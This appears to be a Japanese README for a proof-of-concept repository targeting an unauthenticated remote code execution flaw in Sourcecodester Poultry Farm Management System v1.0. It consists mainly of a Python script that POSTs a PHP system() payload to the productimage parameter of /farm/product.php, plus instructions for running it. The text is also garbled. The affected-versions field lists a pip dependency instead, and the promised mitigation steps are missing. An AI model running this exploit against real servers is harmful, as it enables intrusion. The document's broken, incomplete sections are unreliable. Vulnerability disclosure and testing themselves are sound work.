
Sourcecodester Poultry Farm Management Systemの脆弱なproductimageパラメータを介した認証なしリモートコード実行を実証する概念実証スクリプト。
このリポジトリには、Sourcecodester Poultry Farm Management System v1.0 における未認証リモートコード実行 (RCE) の脆弱性を実証する概念実証 (PoC) スクリプトが含まれています。脆弱性は /farm/product.php の productimage パラメータに存在し、攻撃者がサーバー上で任意のコードを実行することを可能にします。
CVE-ID: (未定)
概要:
Sourcecodester Poultry Farm Management System v1.0 には、/farm/product.php の productimage パラメータを介した未認証リモートコード実行 (RCE) の脆弱性が存在します。この脆弱性により、攻撃者は認証なしでサーバー上で任意のコードを実行できます。
影響を受けるバージョン:
requests ライブラリ (pip install requests)このスクリプトは、攻撃者が脆弱なパラメータに悪意のあるリクエストを送信することで RCE 脆弱性を悪用する方法を示しています。
以下のスクリプトを rce_poc.py として保存し、実行します。
import requests
# Configuration
target_url = "http://target-url/farm/product.php" # Change this to the target URL
# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"
# Construct the malicious request
data = {
'productimage': payload # The vulnerable parameter
}
def exploit_rce(url, data):
"""
Exploit the RCE vulnerability by sending a malicious request to the target URL.
Args:
url (str): The target URL.
data (dict): The data to be sent in the POST request.
"""
try:
response = requests.post(url, data=data)
# Print the response details
print("Status Code:", response.status_code)
print("Response Body:", response.text)
if response.status_code == 200:
print("[+] Successfully executed the payload.")
else:
print("[-] Failed to execute the payload.")
except requests.RequestException as e:
print(f"[-] An error occurred: {e}")
if __name__ == "__main__":
print(f"Sending malicious request to: {target_url}")
exploit_rce(target_url, data)
target_url を脆弱なサーバーの /farm/product.php エンドポイントの URL に設定します。productimage パラメータに悪意のあるペイロードを含む POST リクエストを構築します。exploit_rce() 関数は、ターゲット URL に悪意のあるリクエストを送信し、レスポンスの詳細を出力します。この脆弱性を緩和するには、以下の手順を適用してください。
これらの緩和策とセキュリティのベストプラクティスに従うことで、Sourcecodester Poultry Farm Management System v1.0 におけるこの RCE 問題のような脆弱性を防止できます。